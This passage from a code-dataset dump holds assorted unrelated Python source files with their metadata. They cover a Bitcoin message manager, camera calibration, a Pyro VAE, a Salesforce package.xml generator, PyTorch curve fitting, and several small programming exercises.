Category\nfrom models.productdownload import ProductDownloader\nfrom settings.settings import category_list\n\n\nclass CategoryDownloader:\n \"\"\"Download the categories\"\"\"\n\n def get_category(self):\n \"\"\"Add the categories to the list\"\"\"\n all_category = []\n for category in category_list:\n cat = Category()\n cat.name = category\n get_products = ProductDownloader()\n products = get_products.product_by_category(category)\n cat.products = get_products.filter_product(products)\n all_category.append(cat)\n\n return all_category\n","sub_path":"models/categorydownloader.py","file_name":"categorydownloader.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139739336","text":"#/usr/bin/env python\n#encoding:utf-8\nfrom distutils.version import StrictVersion\nimport json\n\nclass MessageManager:\n\n PROTOCOL_NAME = 'simple_bitcoin_protocol'\n MY_VERSION = '0.1.0'\n\n MSG_ADD = 0\n MSG_REMOVE = 1\n MSG_CORE_LIST = 2\n MSG_REQUEST_CORE_LIST = 3\n MSG_PING = 4\n MSG_ADD_AS_EDGE = 5\n MSG_REMOVE_EDGE = 6\n\n ERR_PROTOCOL_UNMATCH = 0\n ERR_VERSION_UNMATCH = 1\n OK_WITH_PAYLOAD = 2\n OK_WITHOUT_PAYLOAD = 3\n\n def __init__(self):\n print('Initializing MessageManager...')\n\n def build_message(self, msg_type, payload=None):\n\n message = {\n 'protocol': MessageManager.PROTOCOL_NAME,\n 'version': MessageManager.MY_VERSION,\n 'msg_type': msg_type,\n }\n\n if payload is not None:\n message[\"payload\"] = payload\n\n return json.dumps(massage)\n\n def parse_message(self, msg):\n\n msg = json.loads(msg)\n msg_ver = StrictVersion(msg[\"version\"])\n\n if msg['protocol'] != MessageManager.PROTOCOL_NAME:\n return ('error', MessageManager.ERR_PROTOCOL_UNMATCH)\n elif msg_ver > StrictVersion(MessageManager.MY_VERSION):\n return ('error', MessageManager.ERR_VERSION_UNMATCH)\n elif msg['msg_type'] == MessageManager.MSG_CORE_LIST:\n result_type = MessageManager.OK_WITH_PAYLOAD\n cmd = msg['msg_type']\n my_port = msg['my_port']\n payload = msg['payload']\n return ('ok', result_type, cmd, payload)\n else:\n result_type = MessageManager.OK_WITHOUT_PAYLOAD\n cmd = msg['msg_type']\n my_port = msg['my_port']\n return ('ok', result_type, cmd)\n","sub_path":"SimpleBitcoin/MessageManager.py","file_name":"MessageManager.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336381272","text":"def analytics(data):\n totalSum = sum(data)\n leftSum = 0\n index = 0\n length = len(data)\n if length == 1:\n return 'YES'\n while index < length - 1:\n val = data[index]\n excl = data[index + 1]\n leftSum += val\n rightSum = totalSum - leftSum - excl\n # print(\"index {}. left {}. ex {}. right {}\".format(index, leftSum, excl, rightSum))\n if leftSum == rightSum:\n return 'YES'\n index += 1\n return 'NO'\n\n\nif __name__ == '__main__':\n N = int(input().strip())\n for test in range(N):\n int(input().strip())\n data = list(map(int, input().strip().split(' ')))\n print(analytics(data))\n","sub_path":"rank/search/sherlokarray/sherlockarray.py","file_name":"sherlockarray.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"479084529","text":"from datetime import datetime\nfrom utils.Dir import Dir\nfrom utils.Text import Text\n\n\nclass DateDomainWriter(object):\n def __init__(self, domain, base_dump_directory='./raw_data'):\n self._str_now = (datetime.now().strftime(\"%m_%d_%y\"))\n self._root_dir = base_dump_directory + '/' + self._str_now + '/' + domain + '/'\n self._file_counter = 1\n\n if not Dir.exists(self._root_dir):\n Dir.create(self._root_dir)\n\n def write(self, text, extension='.txt', delimiter=None):\n file_path = self._root_dir + str(self._file_counter) + extension\n\n Text.write(file_path, text, delimiter)\n\n self._file_counter += 1\n","sub_path":"src/file_writers/DateDomainWriter.py","file_name":"DateDomainWriter.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"220405311","text":"\"\"\"\nLevando os próprios erros em raise\n\nraise - Lança exceções\n\nOBS: raise não é uma função, é um palavra resevada como o raise\n\nPara simplificar, pense que ele funciona como uma forma de revelar por nós um erro\n\nForma de utilizar:\n\nraise Tipodeerro('Mensage de erro')\n\"\"\"\n\n# # raise ValueError(\"Valor incorreto\")\n#\n# # exemplo real\n# def colore(texto, cor):\n# if not type(texto) == str:\n# raise TypeError('Texto precisa ser uma string')\n# if not type(cor) == str:\n# raise TypeError('Cor precisa ser uma string')\n# print(texto, cor)\n\n\n# exemplo real\ndef colore(texto, cor):\n cores = ('Azul', 'Verde', 'Amarelo')\n if not type(texto) == str:\n raise TypeError('Texto precisa ser uma string')\n if not type(cor) == str:\n raise TypeError('Cor precisa ser uma string')\n if cor not in cores:\n raise ValueError('Essa cor não existe dentro dos padrões')\n print(texto, cor)\n\n\ncolore('1', 'Roxo')","sub_path":"Cursos Python/Python 3 Básico ao avançado - Geek University/74 - Levando os próprios erros em raise.py","file_name":"74 - Levando os próprios erros em raise.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593877284","text":"import glob\nimport pickle\nimport cv2\nimport numpy as np\n\n\ndef calibrateCamera():\n # prepare opject points\n nx = 6\n ny = 9\n\n # prepare object points\n objp = np.zeros((nx * ny, 3), np.float32)\n objp[:, :2] = np.mgrid[0:ny, 0:nx].T.reshape(-1, 2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Make a list of calibration images\n images = glob.glob('./camera_cal/calibration*.jpg')\n\n # Step through the list and search for chessboard corners\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (ny, nx), None)\n\n # If found add object points image points\n if ret:\n print('points found in: ' + fname)\n objpoints.append(objp)\n imgpoints.append(corners)\n\n # Draw corners\n # img = cv2.drawChessboardCorners(img, (ny, nx), corners, ret)\n output_fname = './camera_cal/found/' + fname.split('\\\\')[-1]\n print('Write ChessboardCorners to: ' + output_fname)\n\n img = cv2.imread(images[0])\n img_size = (img.shape[1], img.shape[0])\n # safe the camera calibration matrix and the distorbtion factor to the pickle file\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size, None, None)\n\n dist_pickle = {}\n dist_pickle['mtx'] = mtx\n dist_pickle['dist'] = dist\n pickle.dump(dist_pickle, open(\"./camera_cal/calibration_pickle.p\", \"wb\"))\n\n print('Camera Calibration done!')\n","sub_path":"CameraCalibration.py","file_name":"CameraCalibration.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"144499795","text":"#\n#\t\tPython GUI - Menus - PyObjC\n#\n\nfrom AppKit import NSMenu, NSMenuItem, NSOnState, \\\n\tNSCommandKeyMask, NSShiftKeyMask, NSAlternateKeyMask\nfrom GUI import export\nfrom GUI import Globals\nfrom GUI.GMenus import Menu as GMenu, MenuItem\n\n#_ns_standard_actions = {\n#\t'undo_cmd': 'undo:',\n#\t'redo_cmd': 'redo:',\n#\t'cut_cmd': 'cut:',\n#\t'copy_cmd': 'copy:',\n#\t'paste_cmd': 'paste:',\n#\t'clear_cmd': 'clear:',\n#\t'select_all_cmd': 'selectAll:',\n#}\n\nclass Menu(GMenu):\n\n\tdef __init__(self, title, items, **kwds):\n\t\t#print \"Menu: creating with items\", items ###\n\t\tGMenu.__init__(self, title, items, **kwds)\n\t\tns_menu = NSMenu.alloc().initWithTitle_(title)\n\t\tns_menu.setAutoenablesItems_(False)\n\t\tns_menu.setDelegate_(Globals.ns_application)\n\t\tself._ns_menu = ns_menu\n\t\n\tdef _clear_platform_menu(self):\n\t\tns_menu = self._ns_menu\n\t\tn = ns_menu.numberOfItems()\n\t\twhile n:\n\t\t\tn -= 1\n\t\t\tns_menu.removeItemAtIndex_(n)\n\t\n\tdef _add_separator_to_platform_menu(self):\n\t\tns_item = NSMenuItem.separatorItem()\n\t\tself._ns_menu.addItem_(ns_item)\n\t\n\tdef _add_item_to_platform_menu(self, item, name, command = None, index = None):\n\t\tkey = item._key or \"\"\n\t\tif item._shift:\n\t\t\tkey = key.upper()\n\t\telse:\n\t\t\tkey = key.lower()\n\t\tns_item = NSMenuItem.alloc()\n\t\t#ns_action = _ns_standard_actions.get(command, 'menuSelection:')\n\t\tns_action = 'menuSelection:'\n\t\tns_item.initWithTitle_action_keyEquivalent_(name, ns_action, key)\n\t\tns_item.setEnabled_(item.enabled)\n\t\tif item.checked:\n\t\t\tns_item.setState_(NSOnState)\n\t\tns_modifiers = NSCommandKeyMask\n\t\tif item._option:\n\t\t\tns_modifiers |= NSAlternateKeyMask\n\t\tns_item.setKeyEquivalentModifierMask_(ns_modifiers)\n\t\tns_item.setRepresentedObject_(command)\n\t\tif index is not None:\n\t\t\tns_tag = index\n\t\telse:\n\t\t\tns_tag = -1\n\t\tns_item.setTag_(ns_tag)\n\t\tself._ns_menu.addItem_(ns_item)\n\nexport(Menu)\n","sub_path":"GUI/Cocoa/Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526212567","text":"# coding: utf-8\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import log_loss, roc_curve, auc\n\nfrom util import *\n\n\ndef main():\n dtype = {}\n for layer in range(NUM_LAYER):\n for cell in range(NUM_CELL[layer]):\n dtype[\"e{}_{}\".format(layer, cell)] = DTYPE_E\n dtype[\"t{}_{}\".format(layer, cell)] = DTYPE_T\n dtype[\"s{}_{}\".format(layer, cell)] = DTYPE_S\n data = pd.read_csv(abs_path(\"../data/test_set.zip\"), dtype=dtype)\n\n features = ([\"e{}_{}\".format(layer, cell) for layer in range(NUM_LAYER) for cell in range(NUM_CELL[layer])]\n + [\"t{}_{}\".format(layer, cell) for layer in range(NUM_LAYER) for cell in range(NUM_CELL[layer])])\n targets = [\"s{}_{}\".format(layer, cell) for layer in range(NUM_LAYER) for cell in range(NUM_CELL[layer])]\n X = data.loc[:, features].values\n Y = data.loc[:, targets].values\n\n clf = joblib.load(abs_path(\"models/forest_leaf280_full.pkl\"))\n\n Y_pred = clf.predict_proba(X)\n assert Y.shape == Y_pred.shape\n y = Y.reshape((Y.shape[0] * Y.shape[1], ))\n y_pred = Y_pred.reshape((Y_pred.shape[0] * Y_pred.shape[1], ))\n print(\"logloss on test set: {}\".format(log_loss(y, y_pred)))\n\n fpr, tpr, thresholds = roc_curve(y, y_pred)\n roc_auc = auc(fpr, tpr)\n\n print(\"when TPR = {1}, FPR = {0}\".format(*constrained_min_fpr(fpr, tpr, 0.98)))\n print(\"when TPR = {1}, FPR = {0}\".format(*constrained_min_fpr(fpr, tpr, 0.99)))\n\n plt.plot(fpr, tpr, label='auc = {}'.format(roc_auc))\n plt.legend()\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"learning/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"652048271","text":"\n\n# o(n) time o(n) space\n\n\ndef checkPerm(string1, string2):\n if len(string1) != len(string2):\n return False\n\n count = {}\n for letter in string1:\n if letter in count:\n count[letter] += 1\n else:\n count[letter] = 1\n\n for x in string2:\n if x in count:\n count[x] -= 1\n if count[x] < 0:\n return False\n else:\n count[x] = - 1\n if count[x] < 0:\n return False\n\n print(count)\n return True\n\n\nprint(checkPerm(\"hrllo\", \"hello\"))\n","sub_path":"Python/stringPerm.py","file_name":"stringPerm.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"174444359","text":"import pt_helper # helper functions for loading data\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport pyro\nfrom torch.utils.data import DataLoader\nimport pyro.distributions as dist\n\n# set up\npyro.enable_validation(True)\npyro.set_rng_seed(0)\n\n\nclass Decoder(nn.Module):\n \"\"\"\n takes latent variables z, passes through two hidden layers and returns reconstructed x.\n \"\"\"\n def __init__(self, alph_size,seq_len, z_dim=30, hidden_architecture=[100,500]):\n super(Decoder, self).__init__()\n # setup the two linear transformations used\n self.hidden1 = nn.Linear(z_dim,hidden_architecture[0])\n self.hidden2 = nn.Linear(hidden_architecture[0],hidden_architecture[1])\n self.final = nn.Linear(hidden_architecture[1],(alph_size*seq_len))\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, z):\n # define the forward computation on the latent z\n hidden1 = self.relu(self.hidden1(z))\n hidden2 = self.sigmoid(self.hidden2(hidden1))\n output = self.sigmoid(self.final(hidden2))\n return output\n\n\nclass Encoder(nn.Module):\n \"\"\"\n Takes in data, returns mu and sigma for variational approximation of latent variable.\n \"\"\"\n def __init__(self,alph_size,seq_len, z_dim=30, hidden_architecture=[1500,1500]):\n super(Encoder, self).__init__()\n self.hidden1 = nn.Linear((alph_size*seq_len),hidden_architecture[0])\n self.hidden2 = nn.Linear(hidden_architecture[0],hidden_architecture[1])\n self.final1 = nn.Linear(hidden_architecture[1],z_dim)\n self.final2 = nn.Linear(hidden_architecture[1],z_dim)\n self.relu = nn.ReLU()\n self.alph_size = alph_size\n self.seq_len = seq_len\n\n def forward(self, x):\n x = x.reshape(-1,self.seq_len*self.alph_size)\n hidden1 = self.relu(self.hidden1(x))\n hidden2 = self.relu(self.hidden2(hidden1))\n z_loc = self.final1(hidden2)\n z_scale = torch.exp(self.final2(hidden2))\n return z_loc, z_scale\n\n\nclass VAE(nn.Module):\n def __init__(self, alph_size, seq_len, z_dim=30, encoder_architecture=[1500, 1500],\n decoder_architecture=[100, 500], use_cuda=False):\n \"\"\"\n Variational Autoencoder that defines the pyro structure of model and guide\n\n :param alph_size: size of alphabet\n :param seq_len: length of sequence\n :param z_dim: dimensions of latent space\n :param encoder_architecture: nodes per layer for encoder\n :param decoder_architecture: nodes per layer for decoder\n :param use_cuda: GPU command\n \"\"\"\n super(VAE, self).__init__()\n # create the encoder and decoder networks\n # call classes shared by nn.Module\n self.encoder = Encoder(alph_size,seq_len,z_dim, encoder_architecture)\n self.decoder = Decoder(alph_size,seq_len,z_dim, decoder_architecture)\n if use_cuda:\n self.cuda()\n # parameters required in functions\n self.use_cuda = use_cuda\n self.z_dim = z_dim\n self.alph_size = alph_size\n self.seq_len = seq_len\n\n # define the model for conditional distribution p(x|z)p(z)\n def model(self, x):\n pyro.module('decoder', self.decoder) # adds decoder as a pyro module\n with pyro.plate('data', x.shape[0]):\n z_loc = x.new_zeros(torch.Size((x.shape[0], self.z_dim)))\n z_scale = x.new_ones(torch.Size((x.shape[0], self.z_dim)))\n z = pyro.sample('latent', dist.Normal(z_loc, z_scale).to_event(1))\n output = self.decoder.forward(z)\n # score against actual images\n pyro.sample('obs', dist.Bernoulli(output).to_event(1),\n obs=x.reshape(-1, self.alph_size*self.seq_len))\n\n # define the guide (i.e. variational distribution) q(z|x)\n def guide(self, x):\n pyro.module('encoder', self.encoder)\n with pyro.plate('data', x.shape[0]):\n z_loc, z_scale = self.encoder.forward(x)\n # sample the latent code z\n pyro.sample(\"latent\", dist.Normal(z_loc, z_scale).to_event(1))\n\n def reconstruct_output(self, x):\n z_loc, z_scale = self.encoder(x)\n z = dist.Normal(z_loc, z_scale).sample()\n # decode the image (note not sampled; this is non-bayesian)\n output = self.decoder(z)\n return output\n\n\ndef loader_function(data, bs, nw, pm):\n \"\"\"\n :param data: dataset specification for datahelper\n :param bs: batch size\n :param nw: number of workers for cuda\n :param pm: pin memory for GPU\n :return: a pytorch dataloader, alphabet and sequence size from datahelper\n \"\"\"\n datahelper = pt_helper.DataHelper(dataset=data,calc_weights=True)\n x_train = datahelper.x_train.astype(np.float32)\n alph_size = datahelper.alphabet_size\n seq_len = datahelper.seq_len\n data_loader = DataLoader(x_train,batch_size=bs,\n shuffle=True, num_workers=nw, pin_memory=pm)\n return data_loader, alph_size, seq_len\n\n\ndef train(svi, loader, use_cuda=False):\n \"\"\"\n per epoch training function.\n\n :param svi: pyro svi module\n :param loader: data loader from loader_function\n :param use_cuda: GPU command\n :return: loss for that epoch\n \"\"\"\n epoch_loss = 0.\n for x in loader:\n if use_cuda:\n x = x.cuda()\n epoch_loss += svi.step(x)\n\n normalizer_train = len(loader.dataset)\n total_epoch_loss_train = epoch_loss / normalizer_train\n return total_epoch_loss_train\n\n\n\n","sub_path":"models/pyro_model/pyro_vae.py","file_name":"pyro_vae.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414008707","text":"def triangel_bas_upp(bas,sida):\n \"\"\"Skapar en triangel med basen upp\"\"\"\n counter = 0\n triangel1 = \"\"\n for i in range(bas):\n triangel1 += sida * \" \" + counter * \" \" + bas * \"*\" + \"\\n\"\n bas -= 2\n counter += 1\n return triangel1\nprint(triangel_bas_upp(9,2))\n\n\ndef triangel_bas_ned(bas,sida):\n \"\"\"Skapar en triangel med basen ned\"\"\"\n antal_stjärnor = 1\n counter = bas//2\n triangel2 = \"\"\n for i in range(bas):\n triangel2 += sida * \" \" + counter * \" \" + antal_stjärnor * \"*\" + \"\\n\"\n counter -= 1\n antal_stjärnor += 2\n if counter < 0:\n return triangel2\n\nprint(triangel_bas_ned(7,5))\n\n\ndef romb(avstånd,bredd):\n def triangel_bas_upp(bas,sida):\n \"\"\"Skapar en triangel med basen upp\"\"\"\n counter = 0\n triangel = \"\"\n for i in range(bas):\n triangel += sida * \" \" + counter * \" \" + bas * \"*\" + \"\\n\"\n bas -= 2\n counter += 1\n return triangel\n def triangel_bas_ned(bas,sida):\n \"\"\"Skapar en triangel med basen ned\"\"\"\n antal_stjärnor = 1\n counter = bas//2\n triangel = \"\"\n for i in range(bas):\n triangel += sida * \" \" + counter * \" \" + antal_stjärnor * \"*\" + \"\\n\"\n counter -= 1\n antal_stjärnor += 2\n if counter < 0:\n return triangel\n\n return triangel_bas_ned(bredd, avstånd - 1) + triangel_bas_upp(bredd - 2, avstånd)\n\n\nprint(romb(4,7))","sub_path":"Labb2/Extra uppgift.py","file_name":"Extra uppgift.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"634648639","text":"# -*- coding:utf-8 -*-\r\n\r\n__author__ = 'AlexZz2'\r\n\r\nimport random\r\n\r\n'''\r\n 实现一个四则运算的类\r\n 要求:实现两个数的加减乘除运算\r\n'''\r\nclass Calc:\r\n # 初始化\r\n def __init__(self, a, b):\r\n if not (isinstance(a, (int, float)) and isinstance(b, (int, float))):\r\n raise TypeError('bad operand type!')\r\n self.a = a\r\n self.b = b\r\n \r\n # 实现加法运算\r\n def add(self):\r\n return self.a+ self.b\r\n\r\n # 实现减法运算\r\n def sub(self):\r\n return self.a- self.b\r\n\r\n # 实现乘法运算\r\n def mul(self):\r\n return self.a* self.b\r\n\r\n # 实现除法运算\r\n def div(self):\r\n try:\r\n return self.a/ self.b\r\n except ZeroDivisionError as e:\r\n print('Division is Zero!')\r\n raise\r\n\r\n'''\r\n 随机生成count个start~end之间的数,并对生成的count个数进行排序\r\n'''\r\nclass MySort:\r\n '''\r\n start, end 随机数范围\r\n count 生成的随机数的个数\r\n '''\r\n def __init__(self, start, end, count):\r\n if not(isinstance(start, (int, float))):\r\n raise TypeError('bad operand type!')\r\n elif not (isinstance(end, (int, float))):\r\n raise TypeError('bad operand type!')\r\n elif not(isinstance(count, (int))):\r\n raise TypeError('bad operand type!')\r\n else:\r\n self.start = start\r\n self.end = end\r\n self.count = count\r\n self.a = []\r\n # 生成若干个指定范围的随机数并添加入列表中\r\n if self.count <= 0:\r\n print('不生成随机数!')\r\n else: \r\n for i in range(self.count):\r\n self.a.append(random.uniform(self.start, self.end))\r\n print(self.a)\r\n\r\n # 实现排序功能并返回列表\r\n def __mysort__(self):\r\n for i in range(len(self.a)):\r\n for j in range(len(self.a)-i-1):\r\n if self.a[j] > self.a[j+1]:\r\n self.a[j], self.a[j+1] = self.a[j+1], self.a[j]\r\n return self.a\r\n \r\nif __name__ == '__main__':\r\n # Clac对象实例化\r\n result = Calc(4, 2)\r\n print('四则运算结果:', result.div())\r\n # MySort对象实例化\r\n print('初始化:')\r\n mylist = MySort(1, 10, 3)\r\n print('排序后:\\n{0}'.format(mylist.__mysort__()))\r\n ","sub_path":"第一期/深圳-Alex/task01.py","file_name":"task01.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5588404","text":"import os.path\nimport os\nimport subprocess\nimport configparser\nimport logging\nimport shutil\nfrom xml.dom import minidom\nfrom git import Repo\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG) \nc_handler = logging.StreamHandler()\nc_format = logging.Formatter('%(name)s - %(levelname)s - %(message)s')\nc_handler.setFormatter(c_format)\nlogger.addHandler(c_handler)\n\n# BUILD_FOLDER = os.path.join(os.environ['system.teamcity.build.workingDir'],'src')\nWORKING_DIR = os.path.normpath(os.path.dirname(__file__))\nBUILD_FOLDER = os.path.join(WORKING_DIR,'deploy')\nPACKAGE_XML = os.path.join(WORKING_DIR,'package.xml')\nDESTRUCTIVE_XML = os.path.join(WORKING_DIR,'destructiveChangesPost.xml')\nTEMPLATE_XML = os.path.join(WORKING_DIR,'packagexml_template.xml')\n\ndef describe_metadata(config):\n result = subprocess.run([\"ant\",\"describeMetadata\"],text=True,capture_output=True)\n replaced = result.stdout.replace('*','')\n s = replaced.replace('[sf:describeMetadata]','').splitlines()\n xmlNames = [st.replace('XMLName','').replace(':','').strip() for st in s if 'XMLName' in st]\n dirNames = [st.replace('DirName','').replace(':','').strip() for st in s if 'DirName' in st]\n \n config['MAPPING'] = dict(zip(dirNames,xmlNames))\n with open('config.ini','w') as configfile:\n config.write(configfile) \n\ndef get_members(config):\n repo = Repo(WORKING_DIR)\n repo.git.checkout(config['CI']['BRANCH_NAME'])\n logger.debug(f'Getting files from commit on branch {config[\"CI\"][\"BRANCH_NAME\"]}')\n\n head_commit = repo.commit('HEAD')\n \n deleted = []\n if len(head_commit.parents) > 0:\n previous_commit = repo.commit('HEAD~1')\n deleted = [ item.a_path for item in previous_commit.diff(head_commit).iter_change_type('D')]\n\n changed_result = { md_type:[] for md_type in config['MAPPING']}\n deleted_result = { md_type:[] for md_type in config['MAPPING']}\n metadata_ext = ['.cls','.trigger','.component','.page']\n\n for file_path in head_commit.stats.files.keys():\n try:\n if not file_path.endswith('.xml') and 'src' in file_path:\n splitted_path = file_path.split('/')\n path = splitted_path[1:-1]\n md_type = splitted_path[1]\n file = os.path.splitext(splitted_path[-1])\n file_name = file[0]\n file_ext = file[1]\n\n if file_path in deleted:\n deleted_result[md_type].append(file_name)\n else:\n move_to_deploy(file_path,path,BUILD_FOLDER)\n changed_result[md_type].append(file_name)\n if file_ext in metadata_ext:\n md_ext = file_ext + '-meta.xml'\n md_name = file_name + md_ext\n splitted_path[-1] = md_name\n md_path = os.path.join('',*splitted_path)\n move_to_deploy(md_path,path,BUILD_FOLDER)\n\n # if not file_path.endswith('.xml') and 'src' in file_path:\n # splitted_line = file_path.split('/')\n # md_type = splitted_line[-2].lower()\n # member = splitted_line[-1]\n # if file_path in deleted:\n # deleted_result[md_type].append(os.path.splitext(member)[0])\n # else:\n # move_to_deploy(file_path,BUILD_FOLDER)\n # changed_result[md_type].append(os.path.splitext(member)[0])\n except KeyError:\n logger.debug('KeyError, not found metadata type')\n pass\n return (changed_result, deleted_result)\n\ndef move_to_deploy(file_path,path,dst):\n dst = os.path.normpath(os.path.join(dst,*path))\n if not os.path.exists(dst):\n os.makedirs(dst)\n shutil.copy(os.path.normpath(os.path.join(WORKING_DIR,file_path)),dst)\n\n\n\ndef write_type(xml,type_name, members,path):\n root = xml.getElementsByTagName('Package')[0]\n root = xml.documentElement\n\n def createTextElement(xml,parent,tag,value):\n element = xml.createElement(tag)\n text = xml.createTextNode(value)\n element.appendChild(text)\n parent.appendChild(element)\n\n with open(path,'w') as writer:\n type_elem = xml.createElement('types')\n root.appendChild(type_elem)\n\n for member in members:\n createTextElement(xml,type_elem,'members',member)\n createTextElement(xml,type_elem,'name',type_name)\n\n pretty_xml = xml.toprettyxml()\n writer.write(pretty_xml)\n\ndef generate_package_xml(config):\n logger.debug('Start generating package.xml')\n commit_mdt = get_members(config) \n\n def write_members(template_path, items, result_path):\n template_xml = minidom.parse(template_path)\n for mdt_type, members in items:\n if members:\n write_type(template_xml,config['MAPPING'][mdt_type],members,result_path)\n\n write_members(TEMPLATE_XML,commit_mdt[0].items(),PACKAGE_XML)\n write_members(TEMPLATE_XML,commit_mdt[1].items(),DESTRUCTIVE_XML)\n\n\n if os.path.exists(os.path.abspath(PACKAGE_XML)):\n splitted_package = os.path.split(PACKAGE_XML)[1]\n os.replace(PACKAGE_XML, os.path.join(BUILD_FOLDER,splitted_package))\n\n # for fdir in PACKAGE_XML, DESTRUCTIVE_XML:\n # if os.path.exists(os.path.abspath(fdir)):\n # os.replace(fdir, os.path.join(BUILD_FOLDER,fdir))\n # elif fdir == PACKAGE_XML:\n # copyfile(TEMPLATE_XML,os.path.join(BUILD_FOLDER, PACKAGE_XML))\n\n\nif __name__ == \"__main__\":\n config = configparser.ConfigParser()\n config.read(os.path.join(WORKING_DIR,'config.ini'))\n if os.path.exists(BUILD_FOLDER):\n shutil.rmtree(BUILD_FOLDER)\n # if not config.has_section('MAPPING'):\n # describe_metadata(config)\n generate_package_xml(config)\n \n","sub_path":"package_generator.py","file_name":"package_generator.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"270252670","text":"'''\n该代码没有搭建nn.Module模块,只使用了PyTorch的自动求导,\n利用梯度下降的方法暴力拟合曲线 y = np.exp(a*x*x + b*x +c)\n注意,观测点对(x,y)给出,三个参数分别是 x,y,z\n'''\n\nfrom __future__ import print_function, division\n\nimport torch\nfrom torch.autograd import Variable\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(1000) # 为了保证每次产生相同的伪随机数\ntorch.random.manual_seed(1000)\na = 2.0\nb = 3.0\nc = 1.0\nN = 300 # 300个观测数据\n\nX_np = np.random.rand(N)\nnoise = np.random.normal(loc=0.0, scale=1.0, size=N)*20 # 产生的高斯分布噪声,为了明显些,放大了20倍\nY_np = np.exp(a*X_np**2 + b*X_np + c)\nY_observed = Y_np + noise # 加入噪声之后的观测数据\n\n# 首先转换以下numpy的数据类型,PyTorch的求导好像支持float32,在其它地方改也可以\nX_np = X_np.astype('float32')\nnoise = noise.astype(np.float32)\nY_np = Y_np.astype('float32')\nY_observed = Y_observed.astype('float32')\n\nplt.scatter(X_np, Y_observed, color='b', label='Real Data')\nplt.legend()\nplt.title('Real Data')\nplt.show()\n\n\n# ===============================================\n\n# 将Numpy 转为 torch.Tensor\nX = torch.from_numpy(X_np).float().view(-1,1)\nY = torch.from_numpy(Y_observed).float().view(-1,1)\n\n# 经过多次实验之后,感受到了使用下降法的时候,初始值的选择确实很重要,\n# 所以,后来又再后面乘了个系数,让初始值稍微接近真实值一点,但实际中\n# 可能根本就不知道实际值是什么。\na = Variable(torch.abs(torch.randn(1, 1))*5, requires_grad=True)\nb = Variable(torch.abs(torch.randn(1, 1))*5, requires_grad=True)\nc = Variable(torch.abs(torch.randn(1, 1))*3, requires_grad=True)\n\n\n\ndef equation(a,b,c,X):\n return torch.exp(a*X**2 + b*X + c)\n\n# y_pred = equation(a,b,c,X)\n\n# 这里的学习率也是多次实验之后实验出来的,可以在\n# 可以改为一个大点的值,然后在我下方标注“打断点”的\n# 地方打上断点进行调试,可以发现a.grad的值非常大,\n# 这个可以根据y = np.exp(a*x*x + b*x +c)的图像理解\nlr = 0.00000001\nlosses = []\nfor e in range(1000000):\n pred = equation(a, b, c, X)\n loss = torch.mean((Y-pred)**2)\n if a.grad is not None and b.grad is not None and c.grad is not None:\n # PyTorch计算的梯度是会累加的,所以每次计算前要清零,\n # 但是,在没有调用backward()之前,a.grad是None,直接调用会报错,所以加了条件判断\n a.grad.zero_()\n b.grad.zero_()\n c.grad.zero_()\n loss.backward() # 计算梯度\n a.data = a.data - lr*a.grad # 打断点\n b.data = b.data - lr*b.grad\n c.data = c.data - lr*c.grad\n losses.append(loss.item())\n\n print(\"Epoch: {} Loss: {}\".format(e, loss.item()))\n\n# print(a.item(), b.item(), c.item())\n# plt.subplot(1, 2, 1)\n# plt.scatter(X_np, Y_observed, color='b', label='Real Data')\n# plt.scatter(X_np, equation(a,b,c,X).detach().numpy(), color='r', label='Fitting Data')\n# plt.legend(loc='best')\n# plt.title(\"a={:.4f} b={:.4f} c={:.4f}\".format(a.detach().item(), b.detach().item(), c.detach().item()))\n#\n# plt.subplot(1, 2, 2)\n# plt.plot(losses)\n# plt.title('Loss')\n# plt.xlabel('Epoch')\n# plt.ylabel('Loss')\n# plt.show()\n\n\nfig = plt.figure(figsize=(7,3))\nax1 = fig.add_subplot(121)\nax1.scatter(X_np, Y_observed, color='b', label='Real 